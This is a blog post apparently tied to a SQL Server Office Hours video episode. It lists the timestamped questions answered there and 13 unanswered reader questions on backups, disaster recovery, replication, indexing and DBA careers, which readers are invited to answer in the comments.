Here’s what we covered in this episode:

  • 00:00 Introductions
  • 00:43 MergeItLikeItsHot: Hi Brent, do you have any good resources to look at when planning DR procedure for sql server and for Azure sql database specifically?
  • 01:46 Neil: whats your approach to automating restores from prod to test ? how do you select the last backup ? currently i set up a linked server to query msdb on the prod server and find latest backup history. but i want to get rid of all linked servers. is there a better way ?
  • 04:00 Donovan: Is SQL lock pages in memory a best practice or edge case for modern SQL Server and Windows OS? If edge case, when should it be used?
  • 06:06 Trushit: Were you always fluent and comfortable speaking in front of a camera? Any tips for someone who feels awkward ? Even when I listen to the recording of own voice, it sounds so different, in a bad way, than what I hear when I am speaking to someone else.
  • 08:20 CJ Morgan: Have you ever worked w/Bidirectional replication? I ask because we have a client that wants an updateable copy of their database up in Azure and aside from a VM running SQL in Azure, the only replication we see as being supported for and updateable “subscriber” is Bidirectional.
  • 10:00 Eduardo: Do you keep any interesting stats on the questions that are asked each episode (e.g. percent of questions that are new each episode, percent of questions for topic ABC, etc)?
  • 10:20 ILoveData: Hello Brent, just curious what the ad revenue on your small YouTube channel looks like. Is that something you would be willing to share?
  • 11:15 Haydar: Does high VLF count / large transaction log file size affect log shipping performance?
  • 13:13 Seshat: What are the pros / cons of using native SQL backup with multi terabyte DB’s (11+ terabytes)?

Your Turn: I’m Not Answering These 13 Office Hours Questions

Normally, after I do a round of Office Hours, going through the questions that got posted at https://pollgab.com/room/brento, I answer the highly upvoted ones and then clear the queue. If y’all didn’t upvote questions, then I don’t answer ’em.

However, today I’m trying something different: I’ll post the non-upvoted questions here for y’all to see if there’s something you want to answer in the comments. I’ll number ’em so y’all can refer to ’em easier in the comments.

  1. GI Joe DBA: Thoughts on contract to hire jobs? I don’t like them, I want to be hired FT immediately. I think agencies use them to squeeze $$ from the placement but, there’s no guarantee I will be hired and it’s a hassle switching benefits. I’ll only consider it if pay is higher than average.
  2. lockDown: Hi brent, we work on a multitenancy model sql DB and we need to split the data to 2 Dbs, since there multiple apps writing to the DB & the Devs are asking for a schema lock on the (2k) schemas that will be moved. I feel like stoping writes should be done on the App am i right?
  3. Jarkko: Should there be any concerns when a query runs in 2 seconds but consumes 16 seconds worth of CPU time (SQL 2019 Enterprise, 64 cores)?
  4. RonS: Hello Brent, Moving to 2019 SS Standard/HA. 7 databases that need to talk with each other. Standard edition requires each DB to have its own IP address. Current environment all the DB’s live in one server and can see each other (db.schema.table). Linked servers right direction?
  5. CPL: Hi Brent .. What is the process that actually updates indexes? e.g. table with 3 NC indexes & all three indexes contain Col1. If one of these indexes is used where we then update Col1 how are the other 2 indexes subsequently updated? Is it still via the transaction log?
  6. Wenenu: What are the top SQL index naming schemes you see in the field? How did the various schemes originate?
  7. Anatoli: CONTAINSTABLE and FREETEXTTABLE seem to hide the logical reads when statistics io is enabled. Is there an alternate way to see the logical reads incurred by these TVF’s? Using SQL 2019 – 2014 compat mode
  8. Sebastian: How would you change SQL Sentry Plan Explorer to make it more usable / friendly?
  9. DBA_preparing_for_jobsearch: Could you suggest a good strategy on improving left anti semi joins?
  10. Least Significant Who In Whoville: Hola mi amigo. I am the sole DBA at a recently acquired adult beverage manufacturer and our new controlling company. Do you have any suggestion on how to break the news that their adhoc architecture is one mistake away from disaster when their shadetree DBAs know more than me?
  11. Itching to Emigrate: Is it true that Americans in Europe working remotely for American companies fall under GDPR? Can you point us to resources for this question? Everything I see only looks at the consumer side of GDPR.
  12. reps_for_bulk_deletes: For “Full” recovery model, how much bigger than a row of data is the log entries associated with the deletion of that record? Trying to come up with a heuristic for when to approach alternate deletion methods by looking at remaining space in log and on log disk.
  13. BlitzFan: Hi Brent, At our shop we make all kind of backups, SQL backups, Avamar backups of SQL backup shares and of entire databaseservers. But we never test those Avamar backups, so no disaster recovery tests and no disaster recovery plan. What would you say to management?